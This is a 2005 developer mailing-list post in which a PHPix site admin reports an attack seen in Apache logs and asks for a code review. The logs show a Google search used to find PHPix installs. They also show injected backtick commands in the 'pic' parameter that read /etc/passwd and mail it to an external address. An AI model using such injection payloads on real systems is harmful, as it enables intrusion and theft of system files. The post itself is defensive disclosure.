[PHPix2-devel] WARNING, attempt of abuse of PHPix

SourceForge Headquarters 1320 Columbia Street Suite 310 San Diego, CA 92101 +1 (858) 422-6466

Looking into my apache logs, I found this:
___
ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:06 +0100] "GET /albums/?mode=album&album=Divers&dispsize=800&start=0 HTTP/1.1" 200 5348 "http://www.google.de/search?hl=de&q=intext%3AGenerated.by.PHPix+2.0.3%3F+inurl%3A%24mode%3Dalbum&meta=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:07 +0100] "GET /albums/style.css HTTP/1.1" 200 2137 "http://83.192.28.223/albums/?mode=album&album=Divers&dispsize=800&start=0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:09 +0100] "GET /albums/showpic.php?album=Divers&dispsize=100&user=&pic=DSC00039.JPG&width=75&height=100&mode=album HTTP/1.1" 200 7562 "http://83.192.28.223/albums/?mode=album&album=Divers&dispsize=800&start=0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:10 +0100] "GET /CSS/ltpnet-black.css HTTP/1.1" 200 4999 "http://83.192.28.223/albums/?mode=album&album=Divers&dispsize=800&start=0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:11 +0100] "GET /albums/showpic.php?album=Divers&dispsize=100&user=&pic=DSC00040.JPG&width=75&height=100&mode=album HTTP/1.1" 200 7859 "http://83.192.28.223/albums/?mode=album&album=Divers&dispsize=800&start=0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:12 +0100] "GET /albums/blank.gif HTTP/1.1" 200 43 "http://83.192.28.223/albums/?mode=album&album=Divers&dispsize=800&start=0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:13 +0100] "GET /albums/showpic.php?album=Divers&dispsize=100&user=&pic=DSC00041.JPG&width=100&height=75&mode=album HTTP/1.1" 200 7978 "http://83.192.28.223/albums/?mode=album&album=Divers&dispsize=800&start=0" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:20 +0100] "GET /albums/?mode=album&album=Divers&pic=`cat%20/etc/passwd`&dispsize=640&start=0 HTTP/1.1" 200 5480 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
ip68-11-168-198.br.no.cox.net - - [28/Jan/2005:21:24:49 +0100] "GET /albums/?mode=album&album=Divers&pic=`cat%20/etc/passwd%20|%20mail%20w...@gm...`&dispsize=640&start=0 HTTP/1.1" 200 5517 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322)"
___

The email (win...@gm...) is a real one, with a person answering.

I checked the executed PHPix code used during this attack and did some tests. It /seems/ to be ok, the PHPix engine is (probably ?) safe on this point.
But I think it could be a Good Idea to revue the entire code and to look for potential abuse possibilities.

Regards,
	LT-P

-- 
Seals are cute, kiss them